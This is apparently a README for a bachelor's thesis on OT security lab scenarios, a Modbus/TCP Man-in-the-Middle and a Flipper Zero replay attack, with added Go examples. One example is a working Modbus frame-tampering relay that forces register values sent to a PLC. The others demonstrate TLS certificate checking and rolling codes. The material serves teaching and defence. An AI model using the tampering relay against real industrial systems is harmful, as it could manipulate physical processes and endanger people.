This repo hosts my Bachelor's thesis about OT Security.
Abstract • Content of the Thesis • Stack • Credits • License
This thesis examines the security of embedded systems in a world where the boundary between IT and OT becomes increasingly thin. Traditionally, OT systems were physically isolated, and that isolation was what kept them secure. With the advent of the IoT, these systems are becoming more interconnected and therefore more exposed to cyberattacks.
In response to these evolving challenges, the University of Applied Sciences Western Switzerland (HES-SO Valais-Wallis) overhauled its teaching laboratory dedicated to OT security. The lab focuses on practical, hands-on exercises that help students understand the specific challenges of securing embedded systems.
The primary objective of this thesis was to create realistic attack scenarios for use in this laboratory, focusing on the Modbus protocol and on wireless systems. The scenarios are designed to help students identify vulnerabilities in OT systems and learn how to secure them effectively.
The thesis centres on two key attack scenarios. The first is a Man-in-the-Middle attack on Modbus/TCP, demonstrating how an attacker on the network can intercept and alter messages that are neither encrypted nor authenticated. This scenario underlines the importance of implementing TLS and, just as importantly, of verifying the peer's certificate: TLS without certificate verification still leaves the connection open to a MitM. The second scenario is a replay attack on a wireless communication system, using a Flipper Zero to capture and retransmit signals.
- Introduction (P.3-4)
- Impact on Sustainability (P.5)
- Analysis (P.6-14)
  - Attacks (Sniffing, Spoofing, Denial of Service, Replay, Man in the Middle)
  - Communication media (Modbus, wireless M-Bus)
  - Simulation environments (Factory I/O, Home I/O, Minecraft)
- Attack by Man in the Middle (P.15-24)
  - Environment and requirements
  - Attack on Modbus/TCP
  - Implementation of TLS
  - Attack on Modbus/TLS
- Attack by Replay (P.25-30)
  - Environment and requirements
  - Attack on Wireless M-Bus
  - Attack on 433 MHz transceiver
  - Security in wireless broadcast isolated device
- Conclusion (P.31-32)
The full report of this thesis is available at 06-pdf/OT_Security-Heredero_Remi-FinalReport.pdf
The Man-in-the-Middle (MitM) scenario focuses on intercepting, modifying and forwarding packets to take control of a Modbus/TCP installation. Modbus/TCP was selected for this thesis because it is widely adopted in industrial settings and met the requirement of demonstrating an attack on a protocol used in practice. The MitM attack was chosen for its prevalence and its potential for significant impact; it is a comprehensive attack that combines several other techniques, such as sniffing and spoofing through ARP poisoning. The scenario assumes that the attacker has already gained access to the network, which is what makes it possible to intercept and manipulate the data packets. Because Modbus/TCP carries no authentication or integrity check of its own, a rewritten frame is indistinguishable from a genuine one to the PLC.
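As an added example (not code from the thesis or from its repos), the following Go program shows the mechanics the paragraph describes once the attacker is on the path: a Modbus/TCP frame is parsed, a Write Single Register request aimed at a chosen register is rewritten, the MBAP length field is recomputed, and the frame is forwarded; the relay loop reads one ADU at a time so rewrites stay frame-aligned. Register 0x0010, the forced value and the sample request bytes are constructed for this example and do not come from the Home I/O setup.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"io"
	"net"
)

// Frame is a decoded Modbus/TCP ADU: MBAP header (transaction id, protocol id,
// length, unit id) followed by the PDU (function code and data).
type Frame struct {
	TransactionID, ProtocolID uint16
	UnitID, FunctionCode      byte
	Data                      []byte // PDU bytes after the function code
}

// Parse decodes one complete ADU from b, checking the MBAP length field against it.
func Parse(b []byte) (Frame, error) {
	if len(b) < 8 {
		return Frame{}, fmt.Errorf("frame too short: %d bytes", len(b))
	}
	if n := int(binary.BigEndian.Uint16(b[4:6])); n+6 != len(b) { // length counts unit id + PDU
		return Frame{}, fmt.Errorf("MBAP length %d does not match %d payload bytes", n, len(b)-6)
	}
	return Frame{
		TransactionID: binary.BigEndian.Uint16(b[0:2]),
		ProtocolID:    binary.BigEndian.Uint16(b[2:4]),
		UnitID:        b[6],
		FunctionCode:  b[7],
		Data:          append([]byte(nil), b[8:]...), // copy, so edits never touch the input
	}, nil
}

// Bytes re-encodes the frame, recomputing the MBAP length field.
func (f Frame) Bytes() []byte {
	out := make([]byte, 8+len(f.Data))
	binary.BigEndian.PutUint16(out[0:2], f.TransactionID)
	binary.BigEndian.PutUint16(out[2:4], f.ProtocolID)
	binary.BigEndian.PutUint16(out[4:6], uint16(2+len(f.Data)))
	out[6], out[7] = f.UnitID, f.FunctionCode
	copy(out[8:], f.Data)
	return out
}

// Tamper is the attacker's rewrite rule for controller-to-PLC requests: a Write Single
// Register (function 0x06) aimed at targetReg gets its value replaced by forcedValue;
// anything else passes untouched. The bool reports whether the frame was changed.
func Tamper(req []byte, targetReg, forcedValue uint16) ([]byte, bool, error) {
	f, err := Parse(req)
	if err != nil {
		return nil, false, err
	}
	if f.FunctionCode != 0x06 || len(f.Data) != 4 || binary.BigEndian.Uint16(f.Data[0:2]) != targetReg {
		return req, false, nil
	}
	binary.BigEndian.PutUint16(f.Data[2:4], forcedValue)
	return f.Bytes(), true, nil
}

// ReadFrame reads one ADU from a stream: the 6-byte MBAP prefix, then as many bytes
// as its length field announces (2..254, since an ADU is at most 260 bytes).
func ReadFrame(r io.Reader) ([]byte, error) {
	buf := make([]byte, 6, 260)
	if _, err := io.ReadFull(r, buf); err != nil {
		return nil, err
	}
	n := int(binary.BigEndian.Uint16(buf[4:6]))
	if n < 2 || n > 254 {
		return nil, fmt.Errorf("invalid MBAP length %d", n)
	}
	buf = buf[:6+n]
	if _, err := io.ReadFull(r, buf[6:]); err != nil {
		return nil, err
	}
	return buf, nil
}

// Relay is the loop the MitM runs once ARP poisoning has put it on the path: requests
// from client go through rule before reaching server, responses are copied back as-is.
func Relay(client, server net.Conn, rule func([]byte) ([]byte, bool, error)) error {
	go io.Copy(client, server)
	for {
		req, err := ReadFrame(client)
		if err != nil {
			return err
		}
		out, _, err := rule(req)
		if err != nil {
			return err
		}
		if _, err := server.Write(out); err != nil {
			return err
		}
	}
}

func main() {
	req := []byte{0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x01, 0x06, 0x00, 0x10, 0x00, 0x01} // constructed: unit 1, reg 0x0010 := 1
	out, changed, err := Tamper(req, 0x0010, 0x0000)
	fmt.Printf("in  %x\nout %x changed=%v err=%v\n", req, out, changed, err)
}
```

Wiring Relay between two `net.Conn` values (the poisoned client on one side, the real PLC on the other) with `func(b []byte) ([]byte, bool, error) { return Tamper(b, 0x0010, 0) }` as the rule gives the complete interception loop. Note that responses flow back untouched, so the controller still sees a normal acknowledgement for the value it never actually wrote.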
The main repos for this part are:
- Modbus interface for HomeIO simulation
- Controller for HomeIO simulation
- MitM on Modbus/TCP
- MitM on Modbus/TLS without certificate verification
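To make the certificate-verification point concrete, here is an added Go example (not code from the thesis repos). It creates an in-memory site CA, a genuine PLC certificate issued by it and a rogue self-signed certificate for the same name, then runs real TLS handshakes over the loopback interface with two client configurations. The host name `plc.lab.example`, the CA name and the use of a loopback listener are assumptions of the example, and `issue` panics if key generation fails. The client with `InsecureSkipVerify` accepts the rogue certificate, which is precisely the condition the "without certificate verification" MitM relies on; the client with `RootCAs` and `ServerName` set rejects it while still accepting the genuine one.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"time"
)

// Hypothetical host name of the PLC in the lab, chosen for this example only.
const plcName = "plc.lab.example"

// issue generates a P-256 key and a 24-hour certificate for name; KeyUsageCertSign marks a CA.
// With parent == nil the certificate is self-signed, otherwise parentKey signs it. It panics if
// key generation or signing fails, which for fresh keys means the entropy source is broken.
func issue(name string, ku x509.KeyUsage, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (tls.Certificate, *x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(time.Now().UnixNano()),
		Subject:               pkix.Name{CommonName: name},
		DNSNames:              []string{name},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		KeyUsage:              ku,
		BasicConstraintsValid: true,
		IsCA:                  ku&x509.KeyUsageCertSign != 0,
	}
	signer, signerKey := tmpl, key
	if parent != nil {
		signer, signerKey = parent, parentKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		panic(err)
	}
	cert, _ := x509.ParseCertificate(der) // DER we just produced, so it parses
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key}, cert, key
}

// handshake serves serverCert on the loopback interface and connects with clientCfg;
// it returns the client's handshake error (nil means the client accepted the server).
func handshake(serverCert tls.Certificate, clientCfg *tls.Config) error {
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return err
	}
	defer ln.Close()
	done := make(chan struct{})
	go func() {
		defer close(done)
		if conn, err := ln.Accept(); err == nil {
			srv := tls.Server(conn, &tls.Config{Certificates: []tls.Certificate{serverCert}})
			srv.Handshake() // the outcome is judged on the client side
			srv.Close()
		}
	}()
	cli, err := tls.Dial("tcp", ln.Addr().String(), clientCfg) // Dial runs the full handshake
	if err == nil {
		cli.Close()
	}
	<-done
	return err
}

// Demo issues a genuine PLC certificate from a site CA and a rogue self-signed one for the
// same name (what a MitM presents), then tries both against a client that skips verification
// and one that verifies chain and name. A true entry means the client accepted the server.
func Demo() map[string]bool {
	_, caCert, caKey := issue("Lab Site CA", x509.KeyUsageCertSign|x509.KeyUsageDigitalSignature, nil, nil)
	genuine, _, _ := issue(plcName, x509.KeyUsageDigitalSignature, caCert, caKey)
	rogue, _, _ := issue(plcName, x509.KeyUsageDigitalSignature, nil, nil) // attacker's own key
	roots := x509.NewCertPool()
	roots.AddCert(caCert)
	weak := &tls.Config{InsecureSkipVerify: true} // trusts anything: what the Modbus/TLS MitM relies on
	strict := &tls.Config{RootCAs: roots, ServerName: plcName, MinVersion: tls.VersionTLS12} // chain + name
	return map[string]bool{
		"skip-verify/genuine": handshake(genuine, weak) == nil,
		"skip-verify/rogue":   handshake(rogue, weak) == nil,
		"verify/genuine":      handshake(genuine, strict) == nil,
		"verify/rogue":        handshake(rogue, strict) == nil,
	}
}

func main() {
	fmt.Println(Demo())
}
```

The `strict` configuration is what a Modbus/TLS client's `tls.Config` should look like: a root pool containing only the site CA (or the PLC's own certificate) and the expected `ServerName`; `InsecureSkipVerify` must never ship. The Modbus/TCP Security specification additionally uses client certificates (mutual TLS) so that the PLC can also reject unauthorised masters; this example covers only the server-certificate side that the MitM scenario exploits.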
The replay attack scenario consists of capturing a message on a wireless link and resending it to trigger the same effect as the original, for example opening a garage door with a recorded remote signal. This scenario is particularly engaging because it is easy to carry out with a Flipper Zero, which lets students witness a physical attack in action. It also highlights the significance of wireless attacks, a critical topic in the OT world. Since the scenario operates at the physical layer, it offers a perspective complementary to the MitM scenario.
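As an added example (not the thesis's code, and not a model of its specific 433 MHz device or of wireless M-Bus), the following Go program contrasts a fixed-code receiver with a rolling-code receiver to show why a recorded transmission can simply be played back, what the usual countermeasure changes, and the residual weakness that remains. The framing (4-byte counter followed by a 16-byte truncated HMAC-SHA256 tag), the shared key, the fixed code and the window size of 16 are all constructed for this example.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// FixedReceiver models a remote that sends the same code on every press: the receiver
// triggers whenever it hears that code, so a recording played back triggers it too.
type FixedReceiver struct{ code []byte }

func (r FixedReceiver) Accept(msg []byte) bool { return bytes.Equal(msg, r.code) }

// tag computes the 16-byte authentication tag of a counter under the shared key
// (HMAC-SHA256 truncated; a hypothetical framing chosen for this example).
func tag(key []byte, counter uint32) []byte {
	var ctr [4]byte
	binary.BigEndian.PutUint32(ctr[:], counter)
	mac := hmac.New(sha256.New, key)
	mac.Write(ctr[:])
	return mac.Sum(nil)[:16]
}

// Remote is the legitimate rolling-code transmitter: each press sends a fresh
// counter value followed by its tag.
type Remote struct {
	key     []byte
	counter uint32
}

func (t *Remote) Press() []byte {
	t.counter++
	msg := make([]byte, 4, 20)
	binary.BigEndian.PutUint32(msg, t.counter)
	return append(msg, tag(t.key, t.counter)...)
}

// RollingReceiver accepts a transmission only if its tag verifies under the shared key
// and its counter is ahead of the last accepted one by at most window (so presses made
// out of range do not desynchronise the pair).
type RollingReceiver struct {
	key    []byte
	last   uint32
	window uint32
}

func (r *RollingReceiver) Accept(msg []byte) bool {
	if len(msg) != 20 {
		return false
	}
	ctr := binary.BigEndian.Uint32(msg[:4])
	if !hmac.Equal(tag(r.key, ctr), msg[4:]) {
		return false // forged or corrupted
	}
	if ctr <= r.last || ctr-r.last > r.window {
		return false // replayed (stale) or too far ahead
	}
	r.last = ctr
	return true
}

// Scenario records one transmission from each kind of remote and plays it back, as an
// attacker with a Flipper Zero would. It reports whether each replay was accepted, plus
// the jam-and-capture case where the receiver never heard the recorded press.
func Scenario() (fixedReplay, rollingReplay, jammedReplay bool) {
	fixed := FixedReceiver{code: []byte{0xA5, 0x3C, 0x0F}} // constructed fixed code
	captured := []byte{0xA5, 0x3C, 0x0F}                    // the owner's press, as recorded
	fixed.Accept(captured)                                   // door opens for the owner ...
	fixedReplay = fixed.Accept(captured)                     // ... and again for the replay

	key := []byte("constructed-example-key") // shared secret, pre-loaded in both devices
	remote := &Remote{key: key}
	door := &RollingReceiver{key: key, window: 16}
	captured = remote.Press()             // attacker records press #1 ...
	door.Accept(captured)                 // ... which the door hears and accepts
	door.Accept(remote.Press())           // owner presses again: counter moves on to #2
	rollingReplay = door.Accept(captured) // #1 is now stale

	jammed := remote.Press()           // press #3 recorded while the door was jammed: never heard
	jammedReplay = door.Accept(jammed) // still within the window, so it is accepted later
	return
}

func main() {
	f, r, j := Scenario()
	fmt.Printf("fixed-code replay accepted: %v\nrolling-code replay accepted: %v\njam-and-replay accepted: %v\n", f, r, j)
}
```

The third result is the caveat worth teaching alongside the countermeasure: a rolling code defeats a plain replay, but a transmission the receiver never heard (because the attacker jammed it while recording) stays fresh for as long as the window allows, so the window is a trade-off between usability and exposure. The tag is also what prevents an attacker from simply incrementing the counter themselves; a counter without a keyed tag would be forgeable rather than merely replayable.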
The main repo for this part is:
For Go programming, a good starting point is the material cm0x4D made for the HEI Synd IIoT security course. You can find it at https://hei-synd-iiot.github.io/golang/
- Rémi Heredero for the Thesis
- Yann Sierro, Louis Heredero for proofreading
- Silvan Zahno and everyone from Typst for the Typst template
- The Typst template used is under the MIT license.
- Some Typst modules are under Apache 2.0 or GPL 3.0.
- The content of this thesis is under GPL 3.0.